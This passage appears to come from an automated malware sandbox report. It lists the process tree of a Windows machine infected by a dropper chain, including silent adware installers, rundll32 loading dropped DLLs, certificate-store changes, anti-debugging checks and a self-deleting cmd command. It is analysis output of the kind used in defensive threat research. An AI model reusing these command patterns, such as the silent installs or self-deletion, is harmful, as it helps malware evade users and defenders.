C:\Users\Admin\Documents\hAdmjf27kwz_7TsacCSaTWNP.exe"C:\Users\Admin\Documents\hAdmjf27kwz_7TsacCSaTWNP.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Documents\RtAumixa8TXlF5V7YdDzWrks.exe"C:\Users\Admin\Documents\RtAumixa8TXlF5V7YdDzWrks.exe"7⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Documents\Qk3JedfhJSY7CnSFAxcsEsFs.exe"C:\Users\Admin\Documents\Qk3JedfhJSY7CnSFAxcsEsFs.exe"7⤵
-
-
C:\Users\Admin\Documents\e4lvj9H2zYe0drqI4t1gMhaB.exe"C:\Users\Admin\Documents\e4lvj9H2zYe0drqI4t1gMhaB.exe"7⤵
-
C:\Users\Admin\Documents\e4lvj9H2zYe0drqI4t1gMhaB.exe"C:\Users\Admin\Documents\e4lvj9H2zYe0drqI4t1gMhaB.exe" -q8⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\Documents\ODbji71oMpnCbzuxDfn7cqTM.exe"C:\Users\Admin\Documents\ODbji71oMpnCbzuxDfn7cqTM.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6756 -s 2968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\qER2dJVjQNgUwLeyC0GWXVOg.exe"C:\Users\Admin\Documents\qER2dJVjQNgUwLeyC0GWXVOg.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Documents\NHsB55LH9Fo3agTsBITdest0.exe"C:\Users\Admin\Documents\NHsB55LH9Fo3agTsBITdest0.exe"7⤵
-
C:\Users\Admin\Documents\NHsB55LH9Fo3agTsBITdest0.exeC:\Users\Admin\Documents\NHsB55LH9Fo3agTsBITdest0.exe8⤵
-
-
C:\Users\Admin\Documents\NHsB55LH9Fo3agTsBITdest0.exeC:\Users\Admin\Documents\NHsB55LH9Fo3agTsBITdest0.exe8⤵
-
-
-
C:\Users\Admin\Documents\z5Q96Wyhqv9kJfPOXIh6S14m.exe"C:\Users\Admin\Documents\z5Q96Wyhqv9kJfPOXIh6S14m.exe"7⤵
-
C:\Users\Admin\Documents\z5Q96Wyhqv9kJfPOXIh6S14m.exe"C:\Users\Admin\Documents\z5Q96Wyhqv9kJfPOXIh6S14m.exe"8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\Documents\AghY32d_C0IWsfHZSaAte2cz.exe"C:\Users\Admin\Documents\AghY32d_C0IWsfHZSaAte2cz.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6680 -s 2968⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\pI7K3ej8ROAeK0fJrpk5IPcD.exe"C:\Users\Admin\Documents\pI7K3ej8ROAeK0fJrpk5IPcD.exe"7⤵
-
-
C:\Users\Admin\Documents\jzIaxuTRlgKRr5Wp2_W36BRZ.exe"C:\Users\Admin\Documents\jzIaxuTRlgKRr5Wp2_W36BRZ.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\JBnTnGQuA9WcctOzY5oGIag_.exe"C:\Users\Admin\Documents\JBnTnGQuA9WcctOzY5oGIag_.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 2448⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\3h1qGZUEdprlXIwaFgWSdLLy.exe"C:\Users\Admin\Documents\3h1qGZUEdprlXIwaFgWSdLLy.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Documents\mnF7cBF5FzrUArS0hjJ_P4Vj.exe"C:\Users\Admin\Documents\mnF7cBF5FzrUArS0hjJ_P4Vj.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 2568⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\WE1nYf8UVHZ6KQrxi_PpfIcz.exe"C:\Users\Admin\Documents\WE1nYf8UVHZ6KQrxi_PpfIcz.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Documents\oA8ksUPGyLC_UzTW6PxDesM6.exe"C:\Users\Admin\Documents\oA8ksUPGyLC_UzTW6PxDesM6.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Documents\KrKyPnVcJVoVzwCCDEV4Z4fX.exe"C:\Users\Admin\Documents\KrKyPnVcJVoVzwCCDEV4Z4fX.exe"7⤵
-
-
C:\Users\Admin\Documents\wFPK9T1S973QSecHEhL32vPw.exe"C:\Users\Admin\Documents\wFPK9T1S973QSecHEhL32vPw.exe"7⤵
-
-
C:\Users\Admin\Documents\fhvD868tqd9rKMZVwD3ag8Jk.exe"C:\Users\Admin\Documents\fhvD868tqd9rKMZVwD3ag8Jk.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-4GUII.tmp\fhvD868tqd9rKMZVwD3ag8Jk.tmp"C:\Users\Admin\AppData\Local\Temp\is-4GUII.tmp\fhvD868tqd9rKMZVwD3ag8Jk.tmp" /SL5="$203BC,138429,56832,C:\Users\Admin\Documents\fhvD868tqd9rKMZVwD3ag8Jk.exe"8⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-32RAF.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-32RAF.tmp\Setup.exe" /Verysilent9⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"10⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629059113 /qn CAMPAIGN=""710"" " CAMPAIGN="710"11⤵
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" /quiet SILENT=1 AF=715 BF=7156⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629059113 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"7⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"2⤵
- Executes dropped EXE
-
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 4723⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4860 -ip 48601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5112 -ip 51121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv UsXpThP4n06XySnoIexb1A.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6000 -ip 60001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5972 -ip 59721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5928 -ip 59281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 3168 -ip 31681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5948 -ip 59481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1196 -ip 11961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4584 -ip 45841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1236 -ip 12361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4612 -ip 46121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1684 -ip 16841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3624 -ip 36241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4564 -ip 45641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6756 -ip 67561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6680 -ip 66801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 6192 -ip 61921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6820 -ip 68201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5336 -ip 53361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 4908 -ip 49081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 5548 -ip 55481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F3DBF9C638684149483D8280A2DC4CED C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 13FD663930AC7AF4A6C7A87DB91F3150 C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DBE6D998E04067B55EE6D03C46C1D44B2⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 59D9C5376BEAAB86782D23100F64AEE4 C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3834D79033CE5D0B7B3219F2BB272DEA C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding ADB666B036258AF9D9B7C593A53C3B88 C2⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1cc,0x210,0x7fffdc85dec0,0x7fffdc85ded0,0x7fffdc85dee05⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1b8,0x1bc,0x1c0,0x134,0x1c4,0x7ff62a039e70,0x7ff62a039e80,0x7ff62a039e906⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --mojo-platform-channel-handle=1972 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --mojo-platform-channel-handle=2240 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=1968 /prefetch:15⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2004 /prefetch:15⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3236 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --mojo-platform-channel-handle=3524 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --mojo-platform-channel-handle=3652 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --mojo-platform-channel-handle=1740 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --mojo-platform-channel-handle=3232 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --mojo-platform-channel-handle=2848 /prefetch:85⤵
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_3F82.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\EC26.exeC:\Users\Admin\AppData\Local\Temp\EC26.exe1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 7152 -ip 71521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 6336 -ip 63361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\32C5.exeC:\Users\Admin\AppData\Local\Temp\32C5.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 6256 -ip 62561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 7348 -ip 73481⤵
-
C:\Users\Admin\AppData\Local\Temp\48EE.exeC:\Users\Admin\AppData\Local\Temp\48EE.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\Frenetic.exe"C:\Users\Admin\AppData\Local\Temp\Frenetic.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\Frenetic.exeC:\Users\Admin\AppData\Local\Temp\Frenetic.exe3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Goofs.exe"C:\Users\Admin\AppData\Local\Temp\Goofs.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\Goofs.exeC:\Users\Admin\AppData\Local\Temp\Goofs.exe3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\60EB.exeC:\Users\Admin\AppData\Local\Temp\60EB.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\60EB.exeC:\Users\Admin\AppData\Local\Temp\60EB.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\JlDDH5tMEb.exe"C:\Users\Admin\AppData\Local\Temp\JlDDH5tMEb.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\JlDDH5tMEb.exeC:\Users\Admin\AppData\Local\Temp\JlDDH5tMEb.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\123.exe"C:\Users\Admin\AppData\Local\Temp\123.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8512 -s 3046⤵
- Program crash
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\60EB.exe"3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
-
C:\Users\Admin\AppData\Local\Temp\8B87.exeC:\Users\Admin\AppData\Local\Temp\8B87.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\A440.exeC:\Users\Admin\AppData\Local\Temp\A440.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\C0D1.exeC:\Users\Admin\AppData\Local\Temp\C0D1.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\DA17.exeC:\Users\Admin\AppData\Local\Temp\DA17.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 4860 -ip 48601⤵
-
C:\Users\Admin\AppData\Local\Temp\E8AE.exeC:\Users\Admin\AppData\Local\Temp\E8AE.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7492 -s 3082⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\F060.exeC:\Users\Admin\AppData\Local\Temp\F060.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7260 -s 2802⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 7260 -ip 72601⤵
-
C:\Users\Admin\AppData\Local\Temp\F989.exeC:\Users\Admin\AppData\Local\Temp\F989.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\WindowsHelper.exe"C:\Users\Admin\AppData\Local\Temp\WindowsHelper.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\WindowsHelper.exe"C:\Users\Admin\AppData\Local\Temp\WindowsHelper.exe"3⤵
-
